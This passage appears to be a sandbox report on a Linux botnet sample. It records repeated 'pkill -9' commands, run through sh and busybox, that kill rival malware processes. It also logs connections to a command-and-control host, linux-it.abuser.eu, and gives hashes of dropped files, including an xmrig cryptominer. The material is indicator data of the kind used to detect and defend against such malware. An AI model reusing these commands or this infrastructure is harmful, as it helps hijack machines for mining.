/bin/busybox

[busybox pkill -9 obp]

/bin/sh

[sh -c pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420]

/usr/bin/pkill

[pkill -9 BigN0gg0r420]

/bin/busybox

[busybox pkill -9 BigN0gg0r420]

/bin/sh

[sh -c pkill -9 X0102I34f || busybox pkill -9 X0102I34f]

/usr/bin/pkill

[pkill -9 X0102I34f]

/bin/busybox

[busybox pkill -9 X0102I34f]

/bin/sh

[sh -c pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi]

/usr/bin/pkill

[pkill -9 ofhasfhiafhoi]

/bin/busybox

[busybox pkill -9 ofhasfhiafhoi]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/sh

[sh -c pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU]

/usr/bin/pkill

[pkill -9 X19I239124UIU]

/bin/busybox

[busybox pkill -9 X19I239124UIU]

/bin/sh

[sh -c pkill -9 oism || busybox pkill -9 oism]

/usr/bin/pkill

[pkill -9 oism]

/bin/busybox

[busybox pkill -9 oism]

/bin/sh

[sh -c pkill -9 Deported || busybox pkill -9 Deported]

/usr/bin/pkill

[pkill -9 Deported]

/bin/busybox

[busybox pkill -9 Deported]

/bin/sh

[sh -c pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO]

/usr/bin/pkill

[pkill -9 XSHJEHHEIIHWO]

/bin/busybox

[busybox pkill -9 XSHJEHHEIIHWO]

/bin/sh

[sh -c pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12]

/usr/bin/pkill

[pkill -9 olsVNwo12]

/bin/busybox

[busybox pkill -9 olsVNwo12]

/bin/sh

[sh -c pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported]

/usr/bin/pkill

[pkill -9 DeportedDeported]

/bin/busybox

[busybox pkill -9 DeportedDeported]

/bin/sh

[sh -c pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1]

/usr/bin/pkill

[pkill -9 XkTer0GbA1]

/bin/busybox

[busybox pkill -9 XkTer0GbA1]

Network

Country Destination Domain Proto
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:21 linux-it.abuser.eu tcp
IT 95.234.158.87:64338 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp

Files

/tmp/yakuza.mips

MD5 371732a722f576ce663cf832412521a8
SHA1 7d8f25bfc26af545c568ffc5c0afe8c4cd35de40
SHA256 11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0
SHA512 c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014

/tmp/xmrig

MD5 8f4fff0ded94f1141768220906abfbb8
SHA1 ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256 b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA512 0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee